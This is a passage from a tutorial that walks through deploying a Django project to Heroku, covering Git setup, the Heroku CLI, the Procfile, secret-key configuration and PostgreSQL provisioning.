It will start the server on localhost port 8000 by default. You can adjust the port number if another application is already using 8000. The server will keep watching for changes in the project source files and automatically reload them when necessary. While the server is still running, navigate to the URL in your web browser:
The host
127.0.0.1 represents one of the IP addresses on the virtual local network interface. If everything went fine and you haven’t changed the default project settings, then you should land on the Django welcome page:
Hooray! The rocket has taken off, and your Django project is ready for deployment in the cloud.
Step 2: Create a Local Git Repository
Now that you have a working Django project in place, it’s time to take the next step towards hosting it in the cloud. In this section, you’ll explore the available options for building and deploying applications on the Heroku platform. You’ll also create a local Git repository for your project if you haven’t already. At the end of this step, you’ll be ready to deep dive into the Heroku toolchain.
Heroku offers at least five different ways to deploy your project:
- Git: Push commits to a remote Git repository on Heroku
- GitHub: Automatically trigger deployment when a pull request is merged
- Docker: Push Docker images to the Heroku container registry
- API: Automate your deployment programmatically
- Web: Deploy manually from the Heroku dashboard
The most straightforward and developer-centric method is the first one. Many software developers already use Git on a daily basis, so the entry barrier to Heroku can be pretty low. The
git command lets you accomplish a lot in Heroku, which is why you’re going to use Git in this tutorial.
Initialize an Empty Git Repository
Stop your development server with the key combination Ctrl+C or Cmd+C or open another terminal window, then initialize a local Git repository in your project root folder:
$ git init
It doesn’t matter whether your virtual environment is active or not for this to work. It should create a new
.git subfolder, which will contain the history of the files tracked by Git. Folders whose names start with a dot are hidden on macOS and Linux. If you want to check that you created it successfully, then use the
ls -a command to see this folder.
Specify Untracked Files
It’s useful to tell Git which files to ignore so that it doesn’t track them anymore. Some files shouldn’t be part of the repository. You should usually ignore IDE and code editor settings, configuration files with sensitive data such as passwords, binary files like the Python virtual environment, cache files, and data like the SQLite database.
When you check the current status of your new Git repository, it will list all files present in the working directory and suggest adding them to the repository:
$ git status On branch master No commits yet Untracked files: (use "git add <file>..." to include in what will be committed) .idea/ __pycache__/ db.sqlite3 manage.py portfolio/ requirements.txt venv/ nothing added to commit but untracked files present (use "git add" to track)
Instead of adding all of those files and folders, you’ll want to make Git ignore some of them, for example:
.idea/
__pycache__/
db.sqlite3
venv/
The
.idea/ folder is specific to PyCharm. If you’re using Visual Studio Code or another editor, then you’ll need to add their corresponding files and folders to this list. Including more filename patterns upfront will let other contributors safely use the editors and IDEs of their choice without having to update the list too often.
Git looks for a special file called
.gitignore, which is usually placed in your repository’s root folder. Each line contains a concrete filename or a generic filename pattern to exclude. You can edit this file by hand, but it’s much quicker to create one from a predefined set of components using the gitignore.io website:
You’ll notice that typing gitignore.io into the address bar will redirect the browser to a more verbose domain owned by Toptal.
Here, you can choose the programming language, libraries, and tools you’re using. When you’re happy with your selection, click the Create button. Then, either copy and paste the result to a text editor and save it as
.gitignore in your project root folder or note the URL and use cURL in the command line to download the file:
$ curl > .gitignore
If you find yourself typing this URL repeatedly, then you may consider defining an alias command in your shell, which should be easiest to remember:
$ git ignore python,pycharm+all,django > .gitignore
There are often multiple ways to achieve the same goal, and learning about the different options can teach you a lot. Either way, after creating the
.gitignore file, your repository status should look like this:
$ git status On branch master No commits yet Untracked files: (use "git add <file>..." to include in what will be committed) .gitignore manage.py portfolio/ requirements.txt nothing added to commit but untracked files present (use "git add" to track)
The remaining steps of creating a local Git repository are staging your changes and saving them in your first commit.
Make the First Commit
Remember that to work with Heroku through Git, you have to push your code to a remote Git repository. You need to have at least one commit in your local repository to do so. First, add your new files to the staging area, which is a buffer between your working tree and the local repository. Then, recheck the status to verify you haven’t missed anything:
$ git add . $ git status On branch master No commits yet Changes to be committed: (use "git rm --cached <file>..." to unstage) new file: .gitignore new file: manage.py new file: portfolio/__init__.py new file: portfolio/asgi.py new file: portfolio/settings.py new file: portfolio/urls.py new file: portfolio/wsgi.py new file: requirements.txt
These files are ready to be committed, so let’s take their snapshot and save them in a local repository:
$ git commit -m "Initial commit"
It’s always a good idea to provide a descriptive commit message to help you navigate the change history. As a rule of thumb, your message should explain why you made the change. After all, anyone can review the Git log to find out exactly what has changed.
Okay, so what have you learned so far? You know that deploying new releases to the Heroku platform usually involves pushing your local commits to a Git remote. You’ve created a local Git repository and made your first commit. Next, you need to create your free Heroku account.
Step 3: Create a Free Heroku Account
At this point, you’re ready to sign up for a free Heroku account and configure it to your liking.
Django advertises itself as the web framework for perfectionists with deadlines. Heroku takes a similar opinionated approach to hosting web applications in the cloud and aims to reduce development time. It’s a high-level and secure Platform as a Service (PaaS) that takes the burden of infrastructure management off your shoulders, letting you focus on what matters to you the most—writing code.
Fun Fact: Heroku is based on Amazon Web Services (AWS), another popular cloud platform operating mainly in an Infrastructure as a Service (IaaS) model. It’s much more flexible than Heroku and can be more affordable but requires a certain level of expertise.
Many startups and smaller companies don’t have a team of skilled DevOps engineers during their early stages of development. Heroku might be a convenient solution in terms of return on investment for those companies.
To start with Heroku, visit the Heroku sign-up page, fill in the registration form, and wait for an email with a link to confirm your account. It will take you to the password setup page. Once configured, you’ll be able to proceed to your new Heroku dashboard. The first thing you’ll be asked to do is to read and accept the terms of service.
Enable Multi-Factor Authentication (Optional)
This step is purely optional, but Heroku might nag you to enroll in multi-factor authentication (MFA) to increase the protection of your account and keep it secure. This feature is also known as two-factor authentication (2FA) because it typically consists of only two stages to verify your identity.
Fun Fact: My personal Netflix account got hacked at one point, and someone was able to use my credit card, even long after I canceled my subscription. Since then, I enable two-factor authentication in all of my online services.
When logged in to your Heroku dashboard, click your ninja avatar in the top-right corner, choose Account Settings, and then scroll down until you can see the Multi-Factor Authentication section. Click the button labeled Setup Multi-Factor Authentication and choose your verification methods:
- Salesforce Authenticator
- One-Time Password Generator
- Security Key
- Built-In Authenticator
- Recovery Codes
Which of these verification methods should you choose?
Salesforce is the parent company that acquired Heroku in 2010, which is why they promote their proprietary mobile app as your first choice. If you’re already using another authenticator app elsewhere, however, then choose the One-Time Password Generator option and scan the QR code with your app.
The Security Key requires an external hardware USB token, while the Built-In Authenticator method can take advantage of your device’s fingerprint reader, for example, if it comes with one.
Finally, the Recovery Codes can work as an additional password. Even if you’re only planning to use an authenticator app on your phone, you should download the recovery codes as a backup. Without an alternative way to verify your identity, you won’t be able to log in to your Heroku account ever again if you lose, damage, or upgrade your phone. Trust me, I’ve been there!
Heroku used to offer another verification method through SMS sent to your phone, but they discontinued it due to security concerns around it.
Add a Payment Method (Optional)
If you don’t feel comfortable sharing your credit card number with Heroku, then that’s okay. The service will continue to work for free, with reasonable restrictions. However, even if you don’t plan to ever spend a dime on hosting your Django project in the cloud, you still might consider hooking up your payment details. Here’s why.
At the time of writing this tutorial, you’ll get only 550 hours per month with the free account. That’s about 22 days of using a single computer instance 24 hours per day. When you verify your account with a credit card, then that pool climbs up to a generous 1,000 free hours per month.
Note: Regardless of whether you verify your account or not, web applications on the free tier that don’t receive any HTTP traffic within a 30-minute window automatically go to sleep. This conserves your pool of free hours but can make the user experience worse if your app doesn’t get regular traffic. When someone wants to use your web application while it’s in standby mode, it will take a few seconds to spin up again.
Other benefits of verifying your account include the possibilities of using free add-ons such as a relational database, setting up a custom domain, and more. Just remember that if you decide to share your billing information with Heroku, then enabling multi-factor authentication is a worthwhile exercise.
So far, you’ve been interacting with Heroku through their web interface. While this is undoubtedly convenient and intuitive, the fastest way of hosting your Django project online is to use the command line.
Step 4: Install the Heroku CLI
Working in the terminal is an essential skill for any developer. Typing commands might seem intimidating at first, but it becomes second nature after seeing its power. For a seamless developer experience, you’ll want to install the Heroku Command-Line Interface (CLI).
The Heroku CLI will let you create and manage your web applications right from the terminal. In this step, you’ll learn a few essential commands and how to display their documentation. First, follow the installation instructions for your operating system. When done, confirm that the installation was successful with the following command:
$ heroku --version
If the
heroku command was found and you’re on the latest version of the Heroku CLI, then you can enable autocomplete in your shell. It will automatically complete commands and their arguments when you press the Tab key, which saves time and prevents typos.
Note: The tool requires a Node.js server, which most of the installation methods bundle. It’s also an open source project, which means you can take a look at its source code on GitHub.
The Heroku CLI has a modular plugin architecture, which means that its features are self-contained and follow the same pattern. To get a list of all available commands, type
heroku help or simply
heroku in your terminal:
$ heroku CLI to interact with Heroku VERSION heroku/7.56.0 linux-x64 node-v12.21.0 USAGE $ heroku [COMMAND] COMMANDS access manage user access to apps addons tools and services for developing, extending, (...) apps manage apps on Heroku auth check 2fa status (...)
Sometimes, the name of a command may not give away what it does. If you want to find out more details about a particular command and see quick examples of usage, when available, then use the
--help flag:
$ heroku auth --help check 2fa status USAGE $ heroku auth:COMMAND COMMANDS auth:2fa check 2fa status auth:login login with your Heroku credentials auth:logout clears local login credentials and invalidates API session auth:token outputs current CLI authentication token. auth:whoami display the current logged in user
Here, you’re asking for more information about the
auth command by using the
--help flag. You can see that
auth should be followed by a colon (
:) and another command. By typing
heroku auth:2fa, you’re asking the Heroku CLI to check the status of your two-factor authentication setup:
$ heroku auth:2fa --help check 2fa status USAGE $ heroku auth:2fa ALIASES $ heroku 2fa $ heroku twofactor COMMANDS auth:2fa:disable disables 2fa on account
The Heroku CLI commands are hierarchical. They will often have one or more subcommands that you can specify after a colon, like in the example above. Additionally, some of those subcommands may have an alias available at the top level of the command hierarchy. For instance, typing
heroku auth:2fa has the same effect as
heroku 2fa or
heroku twofactor:
$ heroku auth:2fa Two-factor authentication is enabled $ heroku 2fa Two-factor authentication is enabled $ heroku twofactor Two-factor authentication is enabled
All three commands give the same result, which lets you choose the one that’s easier to remember.
In this short section, you installed the Heroku CLI on your computer and got acquainted with its syntax. You’ve seen some handy commands. Now, to get the most out of this command-line tool, you’ll need to log in to your Heroku account.
Step 5: Log In With the Heroku CLI
You can install the Heroku CLI even without creating a Heroku account. However, you have to verify your identity and prove that you have a corresponding Heroku account to do something meaningful with it. In some cases, you might even have more than one account, so logging in allows you to specify which one to use at a given moment.
As you’ll learn later, you don’t stay logged in permanently. It’s a good habit to log in to make sure that you have access and to make sure you’re using the right account. The most straightforward way to log in is through the
heroku login command:
$ heroku login heroku: Press any key to open up the browser to login or q to exit:
This will open your default web browser and neatly obtain your session cookies if you had logged in to the Heroku dashboard before. Otherwise, you’ll need to provide your username, password, and potentially another proof of identity if you enabled two-factor authentication. After a successful login, you can close the tab or the browser window and go back to the terminal.
Note: You can also log in using the headless mode by appending the
--interactive flag to the command, which will prompt you for the username and password instead of starting a web browser. However, this won’t work with multi-factor authentication enabled.
The exposure of your session cookies is temporary when you log in using the CLI because Heroku generates a new authorization token that will be valid for a limited time. It stores the token in the standard
.netrc file in your home directory, but you can also inspect it using the Heroku dashboard or
heroku auth and
heroku authorizations plugins:
$ heroku auth:whoami jdoe@company.com $ heroku auth:token › Warning: token will expire today at 11:29 PM › Use heroku authorizations:create to generate a long-term token f904774c-ffc8-45ae-8683-8bee0c91aa57 $ heroku authorizations Heroku CLI login from 54.239.28.85 059ed27c-d04a-4349-9dba-83a0169277ae global $ heroku authorizations:info 059ed27c-d04a-4349-9dba-83a0169277ae Client: <none> ID: 059ed27c-d04a-4349-9dba-83a0169277ae Description: Heroku CLI login from 54.239.28.85 Scope: global Token: f904774c-ffc8-45ae-8683-8bee0c91aa57 Expires at: Fri Jul 02 2021 23:29:01 GMT+0200 (Central European Summer Time) (in about 8 hours) Updated at: Fri Jul 02 2021 15:29:01 GMT+0200 (Central European Summer Time) (1 minute ago)
The expiration policy seems a bit glitchy at the time of writing this tutorial. The official documentation states that it should remain valid for one year by default, while the Heroku CLI shows about one month, which also corresponds to the session cookie expiration. Regenerating the token manually using the Heroku web interface reduces it to about eight hours. But if you test what the actual expiration date is, you would see that it’s entirely different. Feel free to explore this yourself if you’re curious about the expiration policy at the time that you’re following this tutorial.
Anyway, the
heroku login command is meant for development only. In a production environment, you’d typically generate a long-lived user authorization that never expires with the
authorizations plugin. It can become handy for scripting and automation purposes through the Heroku API.
Step 6: Create a Heroku App
In this step, you’ll create your first Heroku app and learn how it integrates with Git. By the end, you’ll have a publicly available domain address for your project.
In a Django project, apps are independent units of code that encapsulate reusable pieces of functionality. On the other hand, Heroku apps work like scalable virtual computers capable of hosting your entire Django project. Every app consists of the source code, a list of dependencies that must be installed, and the commands to run your project.
At the very minimum, you’ll have one Heroku app per project, but it’s not uncommon to have more. For example, you may want to run the development, staging, and production versions of your project all at the same time. Each can be hooked up to different data sources and have a different set of features.
Note: Heroku pipelines let you create, promote, and destroy apps on demand to facilitate a continuous delivery workflow. You can even hook up GitHub so that every feature branch will receive a temporary app for testing.
To create your first app using the Heroku CLI, make sure that you’re already logged in to Heroku, and run either the
heroku apps:create command or its alias:
$ heroku create Creating app... done, ⬢ polar-island-08305 |
By default, it chooses a random app name that’s guaranteed to be unique, such as
polar-island-08305. You can choose your own, too, but it has to be universally unique across the entire Heroku platform because it’s a part of the domain name that you get for free. You’ll quickly find out if it’s already taken:
$ heroku create portfolio-project Creating ⬢ portfolio-project... ! ▸ Name portfolio-project is already taken
If you think about how many people use Heroku, it’s not a big surprise that someone has already created an app with the name
portfolio-project. When you run the
heroku create command inside a Git repository, Heroku automatically adds a new remote server to your
.git/config file:
$ tail -n3 .git/config [remote "heroku"] url = fetch = +refs/heads/*:refs/remotes/heroku/*
The last three rows in your Git configuration file define a remote server named
heroku, which points to your unique Heroku app.
Typically, you’ll have one remote server—for example, on GitHub or Bitbucket—in your Git configuration after cloning a repository. However, there can be multiple Git remotes in a local repository. You’ll use that feature later to make new app releases and deployments to Heroku.
Note: Sometimes, working with Git can get messy. If you notice that you accidentally created a Heroku app outside your local Git repository or through the web interface, then you can still add the corresponding Git remote manually. First, change your directory to the project root folder. Next, list your apps to find the desired name:
$ heroku apps === jdoe@company.com Apps fathomless-savannah-61591 polar-island-08305 sleepy-thicket-59477
After you’ve identified the name of your app—in this case,
polar-island-08305—you can use the
git remote add command or the corresponding
git plugin in the Heroku CLI to add a remote named
heroku:
$ heroku git:remote --app polar-island-08305 set git remote heroku to
This will add a remote server named
heroku unless specified otherwise.
When you created a new app, it told you its public web address in the
.herokuapp.com domain. In this tutorial, the public web address was, but yours will be different. Try navigating your web browser to your unique domain and see what happens next. If you can’t remember the exact URL, just type the
heroku open command in the terminal while you’re in the project root folder. It will open a new browser window and fetch the right resource:
Great job! Your Heroku app is already responding to HTTP requests. However, it’s currently empty, which is why Heroku displays a generic placeholder view instead of your content. Let’s deploy your Django project into this blank app.
Step 7: Deploy Your Django Project to Heroku
At this point, you have everything you need to start hosting your Django project on Heroku. However, if you tried deploying your project to Heroku now, it’d fail because Heroku doesn’t know how to build, package, and run your project. It also doesn’t know how to install the specific Python dependencies listed in your requirements file. You’ll fix that now.
Choose a Buildpack
Heroku automates a lot of the deployment steps, but it needs to know your project setup and the technology stack. The recipe to build and deploy a project is known as a buildpack. There are already a few official buildpacks available for many backend technologies, including Node.js, Ruby, Java, PHP, Python, Go, Scala, and Clojure. Apart from that, you can find third-party buildpacks for less popular languages such as C.
You can set one manually when you create a new app or you can let Heroku detect it based on the files in your repository. One way for Heroku to recognize a Python project is by looking for the
requirements.txt file in your project root directory. Make sure that you’ve created one, which you may have done with
pip freeze when setting up your virtual environment, and that you’ve committed it to the local repository.
Some other files that will help Heroku recognize a Python project are
Pipfile and
setup.py. Heroku will also recognize the Django web framework and provide special support for it. So if your project includes
requirements.txt,
Pipfile, or
setup.py, then there’s usually no action required to set a buildpack unless you’re dealing with some edge case.
Choose the Python Version (Optional)
By default, Heroku will pick a recent Python version to use to run your project. However, you can specify a different version of the Python interpreter by placing a
runtime.txt file in your project root directory, remembering to commit it:
$ echo python-3.9.6 > runtime.txt $ git add runtime.txt $ git commit -m "Request a specific Python version"
Note that your Python version must include all
major.minor.patch components of the semantic versioning. While there are only a few supported runtimes for Python, you can usually tweak the patch version. There’s also beta support for PyPy.
Specify Processes to Run
Now that Heroku knows how to build your Django project, it needs to know how to run it. A project can be comprised of multiple components such as the web component, background workers, relational database, NoSQL database, scheduled jobs, and so on. Every component runs in a separate process.
There are four primary process types:
web: Receives the HTTP traffic
worker: Performs work in the background
clock: Executes a scheduled job
release: Runs a task before deployment
In this tutorial, you’ll only look at the web process because every Django project needs at least one. You can define it in a file named
Procfile, which must be placed in your project root directory:
portfolio-project/ │ ├── .git/ │ ├── portfolio/ │ ├── __init__.py │ ├── asgi.py │ ├── settings.py │ ├── urls.py │ └── wsgi.py │ ├── venv/ │ ├── .gitignore ├── db.sqlite3 ├── manage.py ├── Procfile ├── requirements.txt └── runtime.txt
The
Procfile is a single, language-agnostic format for defining the processes making up your project. It will instruct Heroku on how to run your web server. Although working with the built-in development server isn’t the recommended practice for running a Django project in production, you can use it for this exercise:
$ echo "web: python manage.py runserver 0.0.0.0:\$PORT" > Procfile $ git add Procfile $ git commit -m "Specify the command to run your project"
To make the server accessible from the world outside of the Heroku cloud, you specify the address as
0.0.0.0 instead of the default
localhost. It will bind the server on a public network interface. Heroku provides the port number through the
PORT environment variable.
You can now test this configuration by running your Django project locally using the Heroku CLI:
$ heroku local
By default, if you don’t specify a process type explicitly, it’ll run the
web process. The
heroku local command is the same as
heroku local web. Also, if you don’t set the port number with the
--port flag, then it’ll use the default port
5000.
You’ve now specified the processes you want Heroku to run. When you open the URL in your web browser, then you should see the familiar rocket on the Django welcome page again. However, to access the same resource through the public interface at, you’ll need to tweak the Django configuration, or else you’ll receive a Bad Request error.
Configure Django
You built a bare-bones Django project earlier, and now it’s time to configure it so that it’s ready to run on your Heroku instance. Configuring a Django project lets you fine-tune various settings ranging from database credentials to the template engine.
To access your Django project through a non-local network address, you need to specify
ALLOWED_HOSTS in your project settings. Other than that, the Django buildpack for Python runs the
collectstatic command for you, which requires the
STATIC_ROOT option to be defined. Regardless of whether you use Heroku or not, there are a few more configuration options to be changed when deploying a Django project, but they aren’t mandatory at this stage.
Instead of configuring Django by hand, you can take a shortcut and install a convenient
django-heroku package that will take care of all that and more.
Note: The package
django-heroku is no longer maintained, and the corresponding GitHub repository was archived. It might not be an issue if you only want to get your feet wet with deploying a Django project to Heroku. However, for a production-grade application, you can try a fork called
django-on-heroku, which Adam suggested in the comments section below. Alternatively, you can use an experimental buildpack described by Eric Matthes on his blog.
Make sure you’re in the right virtual environment before proceeding, and remember to refresh your requirements file when done:
(portfolio) $ python -m pip install django-heroku (portfolio) $ python -m pip freeze > requirements.txt
This will replace your requirements file’s content with the most recent dependencies of the project. Next, append these two lines of Python code to your
portfolio/settings.py file, and don’t forget to return to the project root folder afterward:
(portfolio) $ pushd portfolio/ (portfolio) $ echo "import django_heroku" >> settings.py (portfolio) $ echo "django_heroku.settings(locals())" >> settings.py (portfolio) $ popd
Alternatively, use
cd portfolio/ and
cd .. instead of the
pushd and
popd commands if they don’t work in your shell.
Because you appended the output of the
echo commands with append redirection operators (
>>) above, you now have two lines of code at the very bottom of your Django settings file:
# portfolio/settings.py # ... import django_heroku django_heroku.settings(locals())
This will update the variables in your local namespace with values based on your project layout and the environment variables. Finally, don’t forget to commit your changes to the local Git repository:
(portfolio) $ git commit -am "Automatic configuration with django-heroku"
Now, you should be able to access your Django web server using the
0.0.0.0 hostname. Without it, you wouldn’t be able to visit your app through the public Heroku domain.
Configure the Heroku App
You chose a buildpack and a Python version for your project. You also specified the web process to receive HTTP traffic and configured your Django project. The last configuration step before deploying your Django project to Heroku requires setting up environment variables on a remote Heroku app.
Regardless of your cloud provider, it’s important to take care of configuration management. In particular, sensitive information such as database passwords or the secret key used to cryptographically sign Django sessions must not be stored in the code. You should also remember to disable the debug mode as it can make your site vulnerable to hacker attacks. However, keep it as is for this tutorial as you won’t have any custom content to show.
A common means for passing such data are environment variables. Heroku lets you manage the environment variables of an app through the
heroku config command. For example, you might want to read the Django secret key from an environment variable instead of hard-coding it in the
settings.py file.
Since you installed
django-heroku, you can let it handle the details. It detects the
SECRET_KEY environment variable and uses it to set the Django secret key for cryptographic signing. It’s crucial to keep that secret key safe. In
portfolio/settings.py, find the auto-generated line where Django defines the
SECRET_KEY variable and comment it out:
# SECURITY WARNING: keep the secret key used in production secret! # SECRET_KEY = 'django-insecure-#+^6_jx%8rmq9oa(frs7ro4pvr6qn7...
Instead of commenting out the
SECRET_KEY variable, you could also remove it altogether. But hold your horses for now, because you might need it in a second.
When you try running
heroku local now, it’ll complain that the Django secret key is not defined anymore, and the server won’t start. To resolve this, you could set the variable in your current terminal session, but it’s more convenient to create a special file named
.env with all your variables for local testing. The Heroku CLI will recognize this file and load the environment variables defined in it.
Note: Git shouldn’t track the
.env file you just created. It should already be listed in your
.gitignore file as long as you followed the earlier steps and used the gitignore.io website.
A quick way to generate a random secret key is to use the OpenSSL command-line tool:
$ echo "SECRET_KEY=$(openssl rand -base64 32)" > .env
If you don’t have OpenSSL installed on your computer and you’re on a Linux machine or macOS, then you could also generate the secret key with the Unix pseudorandom number generator:
$ echo "SECRET_KEY=$(head -c 32 /dev/urandom | base64)" > .env
Either of these two methods will ensure a truly random secret key. You might feel tempted to use a much less secure tool such as
md5sum and seed it with the current date, but this isn’t really secure because an attacker could enumerate possible outputs.
If none of the commands above work on your operating system, then uncomment the
SECRET_KEY variable from
portfolio/settings.py temporarily and start the Django shell in your active virtual environment:
(portfolio) $ python manage.py shell
Once there, you’ll be able to generate a new random secret key using Django’s built-in management utilities:
>>> from django.core.management.utils import get_random_secret_key >>> print(get_random_secret_key()) 6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%
Grab that key and use it to set the
SECRET_KEY variable in your
.env file:
$ echo 'SECRET_KEY=6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%' > .env
The
heroku local command picks up environment variables defined in your
.env file automatically, so it should be working as expected now. Remember to comment out the
SECRET_KEY variable again if you uncommented it!
The final step is specifying a Django secret key for the remote Heroku app:
$ heroku config:set SECRET_KEY='6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%' Setting SECRET_KEY and restarting ⬢ polar-island-08305... done, v3 SECRET_KEY: 6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%
This will permanently set a new environment variable on the remote Heroku infrastructure, which will immediately become available to your Heroku app. You can reveal those environment variables in the Heroku dashboard or with the Heroku CLI:
$ heroku config === polar-island-08305 Config Vars SECRET_KEY: 6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt% $ heroku config:get SECRET_KEY 6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%
Later, you can overwrite it with another value or delete it completely. Rotating secrets often is a good idea to mitigate security threats. Once a secret leaks, you should change it quickly to prevent unauthorized access and limit the damage.
Make an App Release
You might have noticed that configuring the environment variable with the
heroku config:set command produced a peculiar
"v3" string in the output, which resembles a version number. That’s not a coincidence. Every time you modify your app by deploying new code or changing the configuration, you’re creating a new release, which increments that v-number you saw earlier.
To list a chronological history of your app releases, use the Heroku CLI again:
$ heroku releases === polar-island-08305 Releases - Current: v3 v3 Set SECRET_KEY config vars jdoe@company.com 2021/07/02 14:24:29 +0200 (~ 1h ago) v2 Enable Logplex jdoe@company.com 2021/07/02 14:19:56 +0200 (~ 1h ago) v1 Initial release jdoe@company.com 2021/07/02 14:19:48 +0200 (~ 1h ago)
The items on the list are sorted from newest to oldest. The release number always increments. Even when you roll back your app to a previous version, it will create a new release to preserve the complete history.
Making new app releases with Heroku boils down to committing the code to your local Git repository and then pushing your branch to a remote Heroku server. However, before you do, always double-check the
git status for any uncommitted changes, and add them to the local repository as necessary, for example:
$ git status On branch master Changes not staged for commit: (use "git add <file>..." to update what will be committed) (use "git restore <file>..." to discard changes in working directory) modified: portfolio/settings.py no changes added to commit (use "git add" and/or "git commit -a") $ git add . $ git commit -m "Remove a hardcoded Django secret key"
While you can push any local branch, it must be pushed to a specific remote branch for the deployment to work. Heroku only deploys from either the remote
main or
master branches. If you’ve followed along and created your repository with the
git init command, then your default branch should be named
master. Alternatively, if you created it on GitHub, then it will be named
main.
Since both the
main and
master branches exist on the remote Heroku server, you can use a shorthand syntax to trigger the build and deployment:
$ git push heroku master
Here,
master refers to both your local and remote branch. If you’d like to push a different local branch, then specify its name, such as
bugfix/stack-overflow, followed by a colon (
:) and the remote target branch:
$ git push heroku bugfix/stack-overflow:master
Let’s push the default branch to Heroku now and see what happens next:
$ git push heroku master (...) remote: Compressing source files... done. remote: Building source: remote: remote: -----> Building on the Heroku-20 stack remote: -----> Determining which buildpack to use for this app remote: -----> Python app detected remote: -----> Using Python version specified in runtime.txt remote: -----> Installing python-3.9.6 remote: -----> Installing pip 20.2.4, setuptools 47.1.1 and wheel 0.36.2 remote: -----> Installing SQLite3 remote: -----> Installing requirements with pip (...) remote: -----> Compressing... remote: Done: 60.6M remote: -----> Launching... remote: Released v6 remote: deployed to Heroku remote: remote: Verifying deploy... done. To * [new branch] master -> master
Pushing code to Heroku is just like pushing to GitHub, Bitbucket, or another remote Git server. Apart from that, however, it also starts the build process along the way. Heroku will determine the right buildpack based on your project files. It will use the Python interpreter specified in your
runtime.txt file and install dependencies from
requirements.txt.
In practice, it’s more convenient to push your code only once to the Git server of your choice, such as GitHub, and let it trigger the build on Heroku through a webhook. You can read about GitHub Integration in Heroku’s official documentation if you’d like to explore that further.
Note: The first time you push code to Heroku, it may take a while because the platform needs to spin up a new Python environment, install the dependencies, and build an image for its containers. However, subsequent deployments will be faster as the installed dependencies will be already cached.
You can navigate your browser to the public URL of the Heroku app. Alternatively, typing the
heroku open command in your terminal will do it for you:
Congratulations! You’ve just made your project publicly available.
Step 8: Set Up a Relational Database
Well done! You’re almost finished with setting up the hosting for your Django project on Heroku. There’s one final piece of the equation, so hang on for a minute or two.
Up until now, you’ve been using a file-based SQLite database preconfigured by Django. It’s suitable for testing on your local computer but won’t work in the cloud. Heroku has an ephemeral file system, which forgets all changes since your last deployment or a server restart. You need a standalone database engine to persist your data in the cloud.
In this tutorial, you’ll be using a free PostgreSQL instance offered by Heroku as a fully-managed database as a service. You can use a different database engine if you want, but PostgreSQL usually doesn’t require additional configuration.
Provision a PostgreSQL Server
When Heroku detects the Django framework in your project, it automatically spins up a free but limited PostgreSQL instance. It sets up the
DATABASE_URL environment variable with a public URL for your app’s database. The provisioning takes place when you first deploy your app, which can be confirmed by checking the enabled add-ons and configuration variables:
$ heroku addons Add-on Plan Price State ──────────────────────────────────────────────── ───────── ───── ─────── heroku-postgresql (postgresql-trapezoidal-06380) hobby-dev free created └─ as DATABASE The table above shows add-ons and the attachments to the current app (...) $ heroku config === polar-island-08305 Config Vars DATABASE_URL: postgres://ytfeiommjakmxb...amazonaws.com:5432/dcf99cdrgdaqba SECRET_KEY: 6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%
Normally, you’d need to use that variable in
portfolio/settings.py explicitly, but since you installed the
django-heroku module, there’s no need to specify the database URL or the username and password. It’ll automatically pick up the database URL from the environment variable and configure the settings for you.
Moreover, you don’t have to install a database driver to connect to your PostgreSQL instance provisioned by Heroku. On the other hand, it’s desirable to do local development against the same type of database that’s used in the production environment. It promotes parity between your environments and lets you take advantage of the advanced features provided by a given database engine.
When you installed
django-heroku, it already fetched
psycopg2 as a transitive dependency:
(portfolio) $ pip list Package Version --------------- ------- asgiref 3.4.1 dj-database-url 0.5.0 Django 3.2.5 django-heroku 0.3.1 pip 21.1.3 psycopg2 2.9.1 pytz 2021.1 setuptools 56.0.0 sqlparse 0.4.1 whitenoise 5.2.0
psycopg2 is a Python driver for the PostgreSQL database. Since the driver is already present in your environment, you’re ready to start using PostgreSQL in your app right away.
On the free hobby-dev plan, Heroku imposes some limits. You can have at most 10,000 rows that must fit 1 GB of storage. You can’t have more than 20 connections to your database. There’s no cache, and the performance is capped, among many other constraints.
At any time, you can use the
heroku pg command to view the details about your PostgreSQL database provisioned by Heroku:
$ heroku pg === DATABASE_URL Plan: Hobby-dev Status: Available Connections: 1/20 PG Version: 13.3 Created: 2021-07-02 08:55 UTC Data Size: 7.9 MB Tables: 0 Rows: 0/10000 (In compliance) - refreshing Fork/Follow: Unsupported Rollback: Unsupported Continuous Protection: Off Add-on: postgresql-trapezoidal-06380
This short summary contains information about the current number of connections, your database size, the number of tables and rows, and so on.
In the following subsection, you’ll find out how to do something useful with your PostgreSQL database on Heroku.
Update Remote Database Schema
When you define new models in your Django apps, you typically make new migration files and apply them against a database. To update your remote PostgreSQL instance’s schema, you need to run the same migration commands as before, only on the Heroku environment. You’ll see the recommended way of doing this later, but for now, you can run the appropriate command manually:
$ heroku run python manage.py migrate Running python manage.py migrate on ⬢ polar-island-08305... up, run.1434 (Free) Operations to perform: Apply all migrations: admin, auth, contenttypes, sessions Running migrations: Applying contenttypes.0001_initial... OK Applying auth.0001_initial... OK (...)
The
run plugin starts a temporary container called a one-off dyno, which is similar to a Docker container that has access to your app’s source code and its configuration. Since dynos are running Linux containers, you can execute any command in one of them, including an interactive terminal session:
$ heroku run bash Running bash on ⬢ polar-island-08305... up, run.9405 (Free) (~) $ python manage.py migrate Operations to perform: Apply all migrations: admin, auth, contenttypes, sessions Running migrations: No migrations to apply.
Running the Bash shell inside a temporary dyno is a common practice to inspect or manipulate the state of your Heroku app. You can think of it as logging in to a remote server. The only difference is that you’re starting a throwaway virtual machine, which contains a copy of your project files and receives the same environment variables as your live web dyno.
However, this way of running your database migrations isn’t the most reliable because you might forget about it or make a mistake down the road. You’re better off automating this step in the
Procfile by adding the highlighted line:
web: python manage.py runserver 0.0.0.0:$PORT release: python manage.py migrate
Now, every time you make a new release, Heroku will take care of applying any pending migrations:
$ git commit -am "Automate remote migrations" $ git push heroku master (...) remote: Verifying deploy... done. remote: Running release command... remote: remote: Operations to perform: remote: Apply all migrations: admin, auth, contenttypes, sessions remote: Running migrations: remote: No migrations to apply. To d9f4c04..ebe7bc5 master -> master
